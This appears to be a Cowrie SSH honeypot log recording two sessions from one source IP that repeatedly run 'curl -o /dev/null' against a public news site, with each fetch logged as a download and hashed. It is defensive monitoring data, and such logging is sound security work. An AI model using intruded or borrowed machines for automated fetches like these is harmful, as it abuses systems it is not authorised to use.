{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.328248Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.329254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.341078Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.342094Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.353170Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.367680Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.368758Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.379771Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.380650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.389756Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.404091Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.405038Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.407652Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.430095Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.432871Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.433758Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.436612Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.470253Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.480034Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.487304Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.488326Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.504754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.505640Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.527110Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.528445Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.531469Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.541962Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.542994Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.547529Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.550573Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.559136Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.565002Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.567001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.582402Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.583387Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.596431Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.600704Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.601664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.626085Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.628869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.629830Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.634412Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.637272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.638069Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.647745Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.659109Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.668355Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.669422Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.674316Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.675233Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.707958Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.708942Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.712397Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.713848Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.714849Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.717452Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.755750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.756644Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.762612Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.763755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.793175Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.798157Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.799474Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.803948Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.805061Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.811437Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.812842Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.823855Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.846129Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.847322Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.850362Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.851660Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.853946Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.878608Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.894287Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.895311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.899415Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.900501Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.904237Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.906057Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.908842Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.918680Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.934694Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.935930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
